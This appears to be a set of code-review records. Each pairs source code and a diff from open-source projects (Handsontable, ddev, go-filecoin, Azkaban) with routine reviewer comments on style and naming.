this.highlight.getCell() .add(this.selectedRange.current().highlight) .commit() .adjustCoordinates(cellRange); } const layerLevel = this.getLayerLevel(); // If the next layer level is lower than previous then clear all area and header highlights. This is the // indication that the new selection is performing. if (layerLevel < this.highlight.layerLevel) { arrayEach(this.highlight.getAreas(), highlight => void highlight.clear()); arrayEach(this.highlight.getHeaders(), highlight => void highlight.clear()); arrayEach(this.highlight.getActiveHeaders(), highlight => void highlight.clear()); } this.highlight.useLayerLevel(layerLevel); const areaHighlight = this.highlight.createOrGetArea(); const headerHighlight = this.highlight.createOrGetHeader(); const activeHeaderHighlight = this.highlight.createOrGetActiveHeader(); areaHighlight.clear(); headerHighlight.clear(); activeHeaderHighlight.clear(); if (this.highlight.isEnabledFor(AREA_TYPE) && (this.isMultiple() || layerLevel >= 1)) { areaHighlight .add(cellRange.from) .add(cellRange.to) .commit(); if (layerLevel === 1) { // For single cell selection in the same layer, we do not create area selection to prevent blue background. // When non-consecutive selection is performed we have to add that missing area selection to the previous layer // based on previous coordinates. It only occurs when the previous selection wasn't select multiple cells. this.highlight .useLayerLevel(layerLevel - 1) .createOrGetArea() .add(this.selectedRange.previous().from) .commit(); this.highlight.useLayerLevel(layerLevel); } } if (this.highlight.isEnabledFor(HEADER_TYPE)) { if (this.settings.selectionMode === 'single') { headerHighlight.add(cellRange.highlight).commit(); } else { headerHighlight .add(cellRange.from) .add(cellRange.to) .commit(); } } if (this.isSelectedByRowHeader()) { const isRowSelected = this.tableProps.countCols() === cellRange.getWidth(); // Make sure that the whole row is selected (in case where selectionMode is set to 'single') if (isRowSelected) { activeHeaderHighlight .add(new CellCoords(cellRange.from.row, -1)) .add(new CellCoords(cellRange.to.row, -1)) .commit(); } } if (this.isSelectedByColumnHeader()) { const isColumnSelected = this.tableProps.countRows() === cellRange.getHeight(); // Make sure that the whole column is selected (in case where selectionMode is set to 'single') if (isColumnSelected) { activeHeaderHighlight .add(new CellCoords(-1, cellRange.from.col)) .add(new CellCoords(-1, cellRange.to.col)) .commit(); } } this.runLocalHooks('afterSetRangeEnd', coords); } /** * Returns information if we have a multiselection. This method check multiselection only on the latest layer of * the selection. * * @returns {boolean} */ isMultiple() { const isMultipleListener = createObjectPropListener(!this.selectedRange.current().isSingle()); this.runLocalHooks('afterIsMultipleSelection', isMultipleListener); return isMultipleListener.value; } /** * Selects cell relative to the current cell (if possible). * * @param {number} rowDelta Rows number to move, value can be passed as negative number. * @param {number} colDelta Columns number to move, value can be passed as negative number. * @param {boolean} force If `true` the new rows/columns will be created if necessary. Otherwise, row/column will * be created according to `minSpareRows/minSpareCols` settings of Handsontable. */ transformStart(rowDelta, colDelta, force) { const rangeStartAfterTranslation = this.transformation.transformStart(rowDelta, colDelta, force); const rangeStartChanged = this.getSelectedRange().current().highlight !== rangeStartAfterTranslation; // This conditional handle situation when we select cells by headers and there are no visible cells // (all rows / columns are hidden or there is specific cases described in the #6733). Cells in such case are selected // with row headers, but selection is adjusted to start from index 0, not index -1. We loose some information, so // performing "the same selection" basing on internally stored data would give other effect. if (rangeStartChanged) { this.setRangeStart(rangeStartAfterTranslation); } } /** * Sets selection end cell relative to the current selection end cell (if possible). * * @param {number} rowDelta Rows number to move, value can be passed as negative number. * @param {number} colDelta Columns number to move, value can be passed as negative number. */ transformEnd(rowDelta, colDelta) { this.setRangeEnd(this.transformation.transformEnd(rowDelta, colDelta)); } /** * Returns currently used layer level. * * @returns {number} Returns layer level starting from 0. If no selection was added to the table -1 is returned. */ getLayerLevel() { return this.selectedRange.size() - 1; } /** * Returns `true` if currently there is a selection on the screen, `false` otherwise. * * @returns {boolean} */ isSelected() { return !this.selectedRange.isEmpty(); } /** * Returns `true` if the selection was applied by clicking to the row header. If the `layerLevel` * argument is passed then only that layer will be checked. Otherwise, it checks if any row header * was clicked on any selection layer level. * * @param {number} [layerLevel=this.getLayerLevel()] Selection layer level to check. * @returns {boolean} */ isSelectedByRowHeader(layerLevel = this.getLayerLevel()) { return layerLevel === -1 ? this.selectedByRowHeader.size > 0 : this.selectedByRowHeader.has(layerLevel); } /** * Returns `true` if the selection was applied by clicking to the column header. If the `layerLevel` * argument is passed then only that layer will be checked. Otherwise, it checks if any column header * was clicked on any selection layer level. * * @param {number} [layerLevel=this.getLayerLevel()] Selection layer level to check. * @returns {boolean} */ isSelectedByColumnHeader(layerLevel = this.getLayerLevel()) { return layerLevel === -1 ? this.selectedByColumnHeader.size > 0 : this.selectedByColumnHeader.has(layerLevel); } /** * Returns `true` if the selection was applied by clicking on the row or column header on any layer level. * * @returns {boolean} */ isSelectedByAnyHeader() { return this.isSelectedByRowHeader(-1) || this.isSelectedByColumnHeader(-1); } /** * Returns `true` if the selection was applied by clicking on the left-top corner overlay. * * @returns {boolean} */ isSelectedByCorner() { return this.selectedByCorner; } /** * Returns `true` if coords is within selection coords. This method iterates through all selection layers to check if * the coords object is within selection range. * * @param {CellCoords} coords The CellCoords instance with defined visual coordinates. * @returns {boolean} */ inInSelection(coords) { return this.selectedRange.includes(coords); } /** * Returns `true` if the cell corner should be visible. * * @private * @returns {boolean} `true` if the corner element has to be visible, `false` otherwise. */ isCellCornerVisible() { return this.settings.fillHandle && !this.tableProps.isEditorOpened() && !this.isMultiple(); } /** * Returns `true` if the area corner should be visible. * * @param {number} layerLevel The layer level. * @returns {boolean} `true` if the corner element has to be visible, `false` otherwise. */ isAreaCornerVisible(layerLevel) { if (Number.isInteger(layerLevel) && layerLevel !== this.getLayerLevel()) { return false; } return this.settings.fillHandle && !this.tableProps.isEditorOpened() && this.isMultiple(); } /** * Clear the selection by resetting the collected ranges and highlights. */ clear() { this.selectedRange.clear(); this.highlight.clear(); } /** * Deselects all selected cells. */ deselect() { if (!this.isSelected()) { return; } this.inProgress = false; this.clear(); this.runLocalHooks('afterDeselect'); } /** * Select all cells. */ selectAll() { const nrOfRows = this.tableProps.countRows(); const nrOfColumns = this.tableProps.countCols(); // We can't select cells when there is no data. if (nrOfRows === 0 || nrOfColumns === 0) { return; } this.clear(); this.setRangeStartOnly(new CellCoords(-1, -1)); this.selectedByRowHeader.add(this.getLayerLevel()); this.selectedByColumnHeader.add(this.getLayerLevel()); this.setRangeEnd(new CellCoords(nrOfRows - 1, nrOfColumns - 1)); this.finish(); } /** * Make multiple, non-contiguous selection specified by `row` and `column` values or a range of cells * finishing at `endRow`, `endColumn`. The method supports two input formats, first as an array of arrays such * as `[[rowStart, columnStart, rowEnd, columnEnd]]` and second format as an array of CellRange objects. * If the passed ranges have another format the exception will be thrown. * * @param {Array[]|CellRange[]} selectionRanges The coordinates which define what the cells should be selected. * @returns {boolean} Returns `true` if selection was successful, `false` otherwise. */ selectCells(selectionRanges) { const selectionType = detectSelectionType(selectionRanges); if (selectionType === SELECTION_TYPE_EMPTY) { return false; } else if (selectionType === SELECTION_TYPE_UNRECOGNIZED) { throw new Error(toSingleLine`Unsupported format of the selection ranges was passed. To select cells pass\x20 the coordinates as an array of arrays ([[rowStart, columnStart/columnPropStart, rowEnd, columnEnd/columnPropEnd]])\x20 or as an array of CellRange objects.`); } const selectionSchemaNormalizer = normalizeSelectionFactory(selectionType, { propToCol: prop => this.tableProps.propToCol(prop), keepDirection: true, }); const nrOfRows = this.tableProps.countRows(); const nrOfColumns = this.tableProps.countCols(); // Check if every layer of the coordinates are valid. const isValid = !selectionRanges.some((selection) => { const [rowStart, columnStart, rowEnd, columnEnd] = selectionSchemaNormalizer(selection); const _isValid = isValidCoord(rowStart, nrOfRows) && isValidCoord(columnStart, nrOfColumns) && isValidCoord(rowEnd, nrOfRows) && isValidCoord(columnEnd, nrOfColumns); return !_isValid; }); if (isValid) { this.clear(); arrayEach(selectionRanges, (selection) => { const [rowStart, columnStart, rowEnd, columnEnd] = selectionSchemaNormalizer(selection); this.setRangeStartOnly(new CellCoords(rowStart, columnStart), false); this.setRangeEnd(new CellCoords(rowEnd, columnEnd)); this.finish(); }); } return isValid; } /** * Select column specified by `startColumn` visual index or column property or a range of columns finishing at `endColumn`. * * @param {number|string} startColumn Visual column index or column property from which the selection starts. * @param {number|string} [endColumn] Visual column index or column property from to the selection finishes. * @returns {boolean} Returns `true` if selection was successful, `false` otherwise. */ selectColumns(startColumn, endColumn = startColumn) { const start = typeof startColumn === 'string' ? this.tableProps.propToCol(startColumn) : startColumn; const end = typeof endColumn === 'string' ? this.tableProps.propToCol(endColumn) : endColumn; const nrOfColumns = this.tableProps.countCols(); const nrOfRows = this.tableProps.countRows(); const isValid = nrOfRows > 0 && isValidCoord(start, nrOfColumns) && isValidCoord(end, nrOfColumns); if (isValid) { this.setRangeStartOnly(new CellCoords(-1, start)); this.setRangeEnd(new CellCoords(nrOfRows - 1, end)); this.finish(); } return isValid; } /** * Select row specified by `startRow` visual index or a range of rows finishing at `endRow`. * * @param {number} startRow Visual row index from which the selection starts. * @param {number} [endRow] Visual row index from to the selection finishes. * @returns {boolean} Returns `true` if selection was successful, `false` otherwise. */ selectRows(startRow, endRow = startRow) { const nrOfRows = this.tableProps.countRows(); const nrOfColumns = this.tableProps.countCols(); const isValid = isValidCoord(startRow, nrOfRows) && isValidCoord(endRow, nrOfRows); if (isValid) { this.setRangeStartOnly(new CellCoords(startRow, -1)); // Ternary operator placed below handle situation when there are rows, but there are no columns (#6733). this.setRangeEnd(new CellCoords(endRow, nrOfColumns > 0 ? nrOfColumns - 1 : 0)); this.finish(); } return isValid; } /** * Rewrite the rendered state of the selection as visual selection may have a new representation in the DOM. */ refresh() { if (!this.isSelected()) { return; } const cellHighlight = this.highlight.getCell(); const currentLayer = this.getLayerLevel(); cellHighlight.commit().adjustCoordinates(this.selectedRange.current()); // Rewriting rendered ranges going through all layers. for (let layerLevel = 0; layerLevel < this.selectedRange.size(); layerLevel += 1) { this.highlight.useLayerLevel(layerLevel); const areaHighlight = this.highlight.createOrGetArea(); const headerHighlight = this.highlight.createOrGetHeader(); const activeHeaderHighlight = this.highlight.createOrGetActiveHeader(); areaHighlight.commit(); headerHighlight.commit(); activeHeaderHighlight.commit(); } // Reverting starting layer for the Highlight. this.highlight.useLayerLevel(currentLayer); } } mixin(Selection, localHooks); export default Selection;
1
16,864
The line exceeds 120 characters.
handsontable-handsontable
js
@@ -62,6 +62,11 @@ func renderAppDescribe(desc map[string]interface{}) (string, error) { ddevapp.RenderAppRow(appTable, desc) output = fmt.Sprint(appTable) + output = output + "\n\nSite Information\n-----------------\n" + siteInfo := uitable.New() + siteInfo.AddRow("PHP version:", desc["php_version"]) + output = output + fmt.Sprint(siteInfo) + // Only show extended status for running sites. if desc["status"] == ddevapp.SiteRunning { output = output + "\n\nMySQL Credentials\n-----------------\n"
1
package cmd import ( "fmt" "github.com/drud/ddev/pkg/ddevapp" "github.com/drud/ddev/pkg/output" "github.com/drud/ddev/pkg/util" "github.com/gosuri/uitable" "github.com/spf13/cobra" ) // DescribeCommand represents the `ddev config` command var DescribeCommand = &cobra.Command{ Use: "describe [sitename]", Short: "Get a detailed description of a running ddev site.", Long: `Get a detailed description of a running ddev site. Describe provides basic information about a ddev site, including its name, location, url, and status. It also provides details for MySQL connections, and connection information for additional services like MailHog and phpMyAdmin. You can run 'ddev describe' from a site directory to stop that site, or you can specify a site to describe by running 'ddev stop <sitename>.`, Run: func(cmd *cobra.Command, args []string) { var siteName string if len(args) > 1 { util.Failed("Too many arguments provided. Please use 'ddev describe' or 'ddev describe [appname]'") } if len(args) == 1 { siteName = args[0] } site, err := ddevapp.GetActiveApp(siteName) if err != nil { util.Failed("Unable to find any active site named %s: %v", siteName, err) } // Do not show any describe output if we can't find the site. if site.SiteStatus() == ddevapp.SiteNotFound { util.Failed("no site found. have you run 'ddev start'?") } desc, err := site.Describe() if err != nil { util.Failed("Failed to describe site %s: %v", err) } renderedDesc, err := renderAppDescribe(desc) util.CheckErr(err) // We shouldn't ever end up with an unrenderable desc. output.UserOut.WithField("raw", desc).Print(renderedDesc) }, } // renderAppDescribe takes the map describing the app and renders it for plain-text output func renderAppDescribe(desc map[string]interface{}) (string, error) { maxWidth := uint(200) var output string appTable := ddevapp.CreateAppTable() ddevapp.RenderAppRow(appTable, desc) output = fmt.Sprint(appTable) // Only show extended status for running sites. if desc["status"] == ddevapp.SiteRunning { output = output + "\n\nMySQL Credentials\n-----------------\n" dbTable := uitable.New() dbinfo := desc["dbinfo"].(map[string]interface{}) if _, ok := dbinfo["username"].(string); ok { dbTable.MaxColWidth = maxWidth dbTable.AddRow("Username:", dbinfo["username"]) dbTable.AddRow("Password:", dbinfo["password"]) dbTable.AddRow("Database name:", dbinfo["dbname"]) dbTable.AddRow("Host:", dbinfo["host"]) dbTable.AddRow("Port:", dbinfo["port"]) output = output + fmt.Sprint(dbTable) output = output + fmt.Sprintf("\nTo connect to mysql from your host machine, use port %[1]v on 127.0.0.1.\nFor example: mysql --host=127.0.0.1 --port=%[1]v --user=db --password=db --database=db", dbinfo["published_port"]) } output = output + "\n\nOther Services\n--------------\n" other := uitable.New() other.AddRow("MailHog:", desc["mailhog_url"]) other.AddRow("phpMyAdmin:", desc["phpmyadmin_url"]) output = output + fmt.Sprint(other) } output = output + "\n" + ddevapp.RenderRouterStatus() return output, nil } func init() { RootCmd.AddCommand(DescribeCommand) }
1
12,141
Let's go ahead and change "Site" to "Project", since that's the path we've chosen. One less thing to alter in the other issue.
drud-ddev
php
@@ -89,7 +89,6 @@ Prints out information about filecoin process and its environment. sw.Printf("\nEnvironment\n") sw.Printf("FilAPI: \t%s\n", info.Environment.FilAPI) sw.Printf("FilPath:\t%s\n", info.Environment.FilPath) - sw.Printf("GoPath: \t%s\n", info.Environment.GoPath) // Print Config Info sw.Printf("\nConfig\n")
1
package commands import ( "encoding/json" "io" "os" "runtime" cmdkit "github.com/ipfs/go-ipfs-cmdkit" cmds "github.com/ipfs/go-ipfs-cmds" sysi "github.com/whyrusleeping/go-sysinfo" "github.com/filecoin-project/go-filecoin/config" "github.com/filecoin-project/go-filecoin/flags" "github.com/filecoin-project/go-filecoin/repo" ) var inspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Show info about the filecoin node", }, Subcommands: map[string]*cmds.Command{ "all": allInspectCmd, "runtime": runtimeInspectCmd, "disk": diskInspectCmd, "memory": memoryInspectCmd, "config": configInspectCmd, "environment": envInspectCmd, }, } var allInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print all diagnostic information.", ShortDescription: ` Prints out information about filecoin process and its environment. `, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { var allInfo AllInspectorInfo allInfo.Runtime = GetInspectorAPI(env).Runtime() dsk, err := GetInspectorAPI(env).Disk() if err != nil { return err } allInfo.Disk = dsk mem, err := GetInspectorAPI(env).Memory() if err != nil { return err } allInfo.Memory = mem allInfo.Config = GetInspectorAPI(env).Config() allInfo.Environment = GetInspectorAPI(env).Environment() allInfo.FilecoinVersion = GetInspectorAPI(env).FilecoinVersion() return cmds.EmitOnce(res, allInfo) }, Type: AllInspectorInfo{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *AllInspectorInfo) error { sw := NewSilentWriter(w) // Print Version sw.Printf("Version:\t%s\n", info.FilecoinVersion) // Print Runtime Info sw.Printf("\nRuntime\n") sw.Printf("OS: \t%s\n", info.Runtime.OS) sw.Printf("Arch: \t%s\n", info.Runtime.Arch) sw.Printf("Version: \t%s\n", info.Runtime.Version) sw.Printf("Compiler: \t%s\n", info.Runtime.Compiler) sw.Printf("NumProc: \t%d\n", info.Runtime.NumProc) sw.Printf("GoMaxProcs: \t%d\n", info.Runtime.GoMaxProcs) sw.Printf("NumGoRoutines:\t%d\n", info.Runtime.NumGoRoutines) sw.Printf("NumCGoCalls: \t%d\n", info.Runtime.NumCGoCalls) // Print Disk Info sw.Printf("\nDisk\n") sw.Printf("Free: \t%d\n", info.Disk.Free) sw.Printf("Total: \t%d\n", info.Disk.Total) sw.Printf("FSType:\t%s\n", info.Disk.FSType) // Print Memory Info sw.Printf("\nMemory\n") sw.Printf("Swap: \t%d\n", info.Memory.Swap) sw.Printf("Virtual:\t%d\n", info.Memory.Virtual) // Print Environment Info sw.Printf("\nEnvironment\n") sw.Printf("FilAPI: \t%s\n", info.Environment.FilAPI) sw.Printf("FilPath:\t%s\n", info.Environment.FilPath) sw.Printf("GoPath: \t%s\n", info.Environment.GoPath) // Print Config Info sw.Printf("\nConfig\n") marshaled, err := json.MarshalIndent(info.Config, "", "\t") if err != nil { return err } sw.Printf("%s\n", marshaled) return sw.Error() }), }, } var runtimeInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print runtime diagnostic information.", ShortDescription: ` Prints out information about the golang runtime. `, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { out := GetInspectorAPI(env).Runtime() return cmds.EmitOnce(res, out) }, Type: RuntimeInfo{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *RuntimeInfo) error { sw := NewSilentWriter(w) sw.Printf("OS: \t%s\n", info.OS) sw.Printf("Arch: \t%s\n", info.Arch) sw.Printf("Version: \t%s\n", info.Version) sw.Printf("Compiler: \t%s\n", info.Compiler) sw.Printf("NumProc: \t%d\n", info.NumProc) sw.Printf("GoMaxProcs: \t%d\n", info.GoMaxProcs) sw.Printf("NumGoRoutines:\t%d\n", info.NumGoRoutines) sw.Printf("NumCGoCalls: \t%d\n", info.NumCGoCalls) return sw.Error() }), }, } var diskInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print filesystem usage information.", ShortDescription: ` Prints out information about the filesystem. `, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { out, err := GetInspectorAPI(env).Disk() if err != nil { return err } return cmds.EmitOnce(res, out) }, Type: DiskInfo{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *DiskInfo) error { sw := NewSilentWriter(w) sw.Printf("Free: \t%d\n", info.Free) sw.Printf("Total: \t%d\n", info.Total) sw.Printf("FSType:\t%s\n", info.FSType) return sw.Error() }), }, } var memoryInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print memory usage information.", ShortDescription: ` Prints out information about memory usage. `, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { out, err := GetInspectorAPI(env).Memory() if err != nil { return err } return cmds.EmitOnce(res, out) }, Type: MemoryInfo{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *MemoryInfo) error { sw := NewSilentWriter(w) sw.Printf("Swap: \t%d\n", info.Swap) sw.Printf("Virtual:\t%d\n", info.Virtual) return sw.Error() }), }, } var configInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print in-memory config information.", ShortDescription: ` Prints out information about your filecoin nodes config. `, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { out := GetInspectorAPI(env).Config() return cmds.EmitOnce(res, out) }, Type: config.Config{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *config.Config) error { marshaled, err := json.MarshalIndent(info, "", "\t") if err != nil { return err } marshaled = append(marshaled, byte('\n')) _, err = w.Write(marshaled) return err }), }, } var envInspectCmd = &cmds.Command{ Helptext: cmdkit.HelpText{ Tagline: "Print filecoin environment information.", ShortDescription: ` Prints out information about your filecoin nodes environment. `, }, Run: func(req *cmds.Request, res cmds.ResponseEmitter, env cmds.Environment) error { out := GetInspectorAPI(env).Environment() return cmds.EmitOnce(res, out) }, Type: EnvironmentInfo{}, Encoders: cmds.EncoderMap{ cmds.Text: cmds.MakeTypedEncoder(func(req *cmds.Request, w io.Writer, info *EnvironmentInfo) error { sw := NewSilentWriter(w) sw.Printf("FilAPI: \t%s\n", info.FilAPI) sw.Printf("FilPath:\t%s\n", info.FilPath) sw.Printf("GoPath: \t%s\n", info.GoPath) return sw.Error() }), }, } // NewInspectorAPI returns a `Inspector` used to inspect the go-filecoin node. func NewInspectorAPI(r repo.Repo) *Inspector { return &Inspector{ repo: r, } } // Inspector contains information used to inspect the go-filecoin node. type Inspector struct { repo repo.Repo } // AllInspectorInfo contains all information the inspector can gather. type AllInspectorInfo struct { Config *config.Config Runtime *RuntimeInfo Environment *EnvironmentInfo Disk *DiskInfo Memory *MemoryInfo FilecoinVersion string } // RuntimeInfo contains information about the golang runtime. type RuntimeInfo struct { OS string Arch string Version string Compiler string NumProc int GoMaxProcs int NumGoRoutines int NumCGoCalls int64 } // EnvironmentInfo contains information about the environment filecoin is running in. type EnvironmentInfo struct { FilAPI string `json:"FIL_API"` FilPath string `json:"FIL_PATH"` GoPath string `json:"GOPATH"` } // DiskInfo contains information about disk usage and type. type DiskInfo struct { Free uint64 Total uint64 FSType string } // MemoryInfo contains information about memory usage. type MemoryInfo struct { Swap uint64 Virtual uint64 } // Runtime returns infrormation about the golang runtime. func (g *Inspector) Runtime() *RuntimeInfo { return &RuntimeInfo{ OS: runtime.GOOS, Arch: runtime.GOARCH, Version: runtime.Version(), Compiler: runtime.Compiler, NumProc: runtime.NumCPU(), GoMaxProcs: runtime.GOMAXPROCS(0), NumGoRoutines: runtime.NumGoroutine(), NumCGoCalls: runtime.NumCgoCall(), } } // Environment returns information about the environment filecoin is running in. func (g *Inspector) Environment() *EnvironmentInfo { return &EnvironmentInfo{ FilAPI: os.Getenv("FIL_API"), FilPath: os.Getenv("FIL_PATH"), GoPath: os.Getenv("GOPATH"), } } // Disk return information about filesystem the filecoin nodes repo is on. func (g *Inspector) Disk() (*DiskInfo, error) { fsr, ok := g.repo.(*repo.FSRepo) if !ok { // we are using a in memory repo return &DiskInfo{ Free: 0, Total: 0, FSType: "0", }, nil } p, err := fsr.Path() if err != nil { return nil, err } dinfo, err := sysi.DiskUsage(p) if err != nil { return nil, err } return &DiskInfo{ Free: dinfo.Free, Total: dinfo.Total, FSType: dinfo.FsType, }, nil } // Memory return information about system meory usage. func (g *Inspector) Memory() (*MemoryInfo, error) { meminfo, err := sysi.MemoryInfo() if err != nil { return nil, err } return &MemoryInfo{ Swap: meminfo.Swap, Virtual: meminfo.Used, }, nil } // Config return the current config values of the filecoin node. func (g *Inspector) Config() *config.Config { return g.repo.Config() } // FilecoinVersion returns the version of go-filecoin. func (g *Inspector) FilecoinVersion() string { return flags.Commit }
1
21,307
I am for this change iff we are sure the information is no longer helpful. I think this could still be valuable for certain scenarios, wbu?
filecoin-project-venus
go
@@ -296,11 +296,16 @@ public class ImageRampupManagerImpl implements ImageRampupManager { if (null == flow) { log.info("Flow object is null, so continue"); final ImageRampup firstImageRampup = imageRampupList.get(0); + + // Find the imageVersion in the Rampup list with maximum rampup percentage. + final ImageRampup maxImageRampup = imageRampupList.stream() + .max(Comparator.comparing(ImageRampup::getRampupPercentage)) + .orElseGet(() -> firstImageRampup); imageTypeRampupVersionMap.put(imageTypeName, - this.fetchImageVersion(imageTypeName, firstImageRampup.getImageVersion()) + this.fetchImageVersion(imageTypeName, maxImageRampup.getImageVersion()) .orElseThrow(() -> new ImageMgmtException( String.format("Unable to fetch version %s from image " + "versions table.", - firstImageRampup.getImageVersion())))); + maxImageRampup.getImageVersion())))); continue; } int prevRampupPercentage = 0;
1
/* * Copyright 2020 LinkedIn Corp. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package azkaban.imagemgmt.rampup; import azkaban.Constants.ImageMgmtConstants; import azkaban.executor.ExecutableFlow; import azkaban.executor.container.ContainerImplUtils; import azkaban.imagemgmt.daos.ImageRampupDao; import azkaban.imagemgmt.daos.ImageTypeDao; import azkaban.imagemgmt.daos.ImageVersionDao; import azkaban.imagemgmt.dto.ImageMetadataRequest; import azkaban.imagemgmt.exception.ImageMgmtException; import azkaban.imagemgmt.models.ImageRampup; import azkaban.imagemgmt.models.ImageType; import azkaban.imagemgmt.models.ImageVersion; import azkaban.imagemgmt.models.ImageVersion.State; import azkaban.imagemgmt.models.ImageVersionMetadata; import azkaban.imagemgmt.version.VersionInfo; import azkaban.imagemgmt.version.VersionSet; import java.util.Collections; import java.util.Comparator; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Optional; import java.util.Set; import java.util.TreeMap; import java.util.TreeSet; import java.util.stream.Collectors; import javax.inject.Inject; import javax.inject.Singleton; import org.apache.commons.collections4.CollectionUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * This class is responsible for fetching the version of the available images based on currently * active rampup plan and rampup details or the version which is already ramped up and active. Here * is the version selection process for an image type - 1. Fetch the rampup details for the given * image types or for all the image types (Two such methods are provided). 2. Sort the ramp up data * in ascending order of rampup percentage. 3. Generate a random number between 1 to 100 both * inclusive. Let us say the number the number generated is 60. 4. Let us say there are three * versions 1.1.1, 1.1.2 & and 1.1.3 with rampup percantages 10, 30 and 60 respectively. 5. The * above percentage fors three ranges [1 - 10], [11 - 40] & [41 - 100]. The random humber 60 belongs * to the last range i.e. [41 - 100] and hence version 1.1.3 will be selected. If random number * generated is 22 then version 1.1.2 will be selected and so on. 6. If there is no active rampup * plan for an image type or in the active plan if the version is marked unstable or deprecated, and * latest active version will be selected from the image_verions table. 7. If there is no active * version in the image_versions table, it will throw appropriate error message mentioning could not * select version for the image type and the whole process would fail. 8. Follow the rampup * procedure to elect a new version from the image_versions table for the failed image type. */ @Singleton public class ImageRampupManagerImpl implements ImageRampupManager { private static final Logger log = LoggerFactory.getLogger(ImageRampupManagerImpl.class); private final ImageTypeDao imageTypeDao; private final ImageVersionDao imageVersionDao; private final ImageRampupDao imageRampupDao; private static final String MSG_RANDOM_RAMPUP_VERSION_SELECTION = "The version selection is " + "based on random rampup."; private static final String MSG_ACTIVE_VERSION_SELECTION = "The version selection is " + "based on latest available ACTIVE version."; private static final String MSG_NON_ACTIVE_VERSION_SELECTION = "Non ACTIVE " + "(i.e. NEW/UNSTABLE/DEPRECATED) latest version is selected as there is no active rampup " + "and ACTIVE version."; private static final String MSG_IMAGE_TYPE_WITHOUT_VERSION = "This image type does not have a " + "version yet."; @Inject public ImageRampupManagerImpl(final ImageRampupDao imageRampupDao, final ImageVersionDao imageVersionDao, final ImageTypeDao imageTypeDao) { this.imageRampupDao = imageRampupDao; this.imageVersionDao = imageVersionDao; this.imageTypeDao = imageTypeDao; } @Override public Map<String, VersionInfo> getVersionForAllImageTypes(final ExecutableFlow flow) throws ImageMgmtException { final Map<String, List<ImageRampup>> imageTypeRampups = this.imageRampupDao .getRampupForAllImageTypes(); final List<ImageType> imageTypeList = this.imageTypeDao.getAllImageTypes(); final Set<String> imageTypes = new TreeSet<>(); for (final ImageType imageType : imageTypeList) { imageTypes.add(imageType.getName()); } final Set<String> remainingImageTypes = new TreeSet<>(); final Map<String, ImageVersionMetadata> imageTypeVersionMap = this .processAndGetVersionForImageTypes(flow, imageTypes, imageTypeRampups, remainingImageTypes); // Throw exception if there are left over image types if (!remainingImageTypes.isEmpty()) { throw new ImageMgmtException("Could not fetch version for below image types. Reasons: " + " 1. There is no active rampup plan in the image_rampup_plan table. 2. There is no " + " active version in the image_versions table. Image Types: " + remainingImageTypes); } return this.createVersionInfoMap(imageTypeVersionMap); } @Override public Map<String, ImageVersionMetadata> getVersionMetadataForAllImageTypes() throws ImageMgmtException { final Map<String, List<ImageRampup>> imageTypeRampups = this.imageRampupDao .getRampupForAllImageTypes(); final List<ImageType> imageTypeList = this.imageTypeDao.getAllImageTypes(); final Set<String> imageTypes = new TreeSet<>(); for (final ImageType imageType : imageTypeList) { imageTypes.add(imageType.getName()); } final Set<String> remainingImageTypes = new TreeSet<>(); final Map<String, ImageVersionMetadata> imageTypeVersionMap = this.processAndGetVersionForImageTypes(null, imageTypes, imageTypeRampups, remainingImageTypes); if (!remainingImageTypes.isEmpty()) { final Map<String, ImageVersion> imageTypeLatestNonActiveVersionMap = this.getLatestNonActiveImageVersion(remainingImageTypes); log.info("imageTypeLatestNonActiveVersionMap: " + imageTypeLatestNonActiveVersionMap); imageTypeLatestNonActiveVersionMap.forEach((k, v) -> imageTypeVersionMap.put(k, new ImageVersionMetadata(v, MSG_NON_ACTIVE_VERSION_SELECTION))); if (!remainingImageTypes.isEmpty()) { remainingImageTypes.forEach(k -> imageTypeVersionMap.put(k, new ImageVersionMetadata(null, MSG_IMAGE_TYPE_WITHOUT_VERSION))); } } return imageTypeVersionMap; } @Override public Map<String, VersionInfo> validateAndGetUpdatedVersionMap( final ExecutableFlow executableFlow, final VersionSet versionSet) throws ImageMgmtException { // Find the image types for which version is either invalid or not exists final Set<String> imageTypesWithInvalidVersion = versionSet.getImageToVersionMap().entrySet() .stream() .filter(map -> this.imageVersionDao.isInvalidVersion( map.getKey(), map.getValue().getVersion())) .map(map -> map.getKey()) .collect(Collectors.toSet()); final Map<String, VersionInfo> updatedVersionInfoMap = new TreeMap<>( String.CASE_INSENSITIVE_ORDER); if (!imageTypesWithInvalidVersion.isEmpty()) { final Map<String, VersionInfo> versionInfoMap = this .getVersionByImageTypes(executableFlow, imageTypesWithInvalidVersion); // Update the correct version in versionSet versionInfoMap.forEach((k, v) -> updatedVersionInfoMap.put(k, v)); versionSet.getImageToVersionMap().entrySet() .forEach(map -> 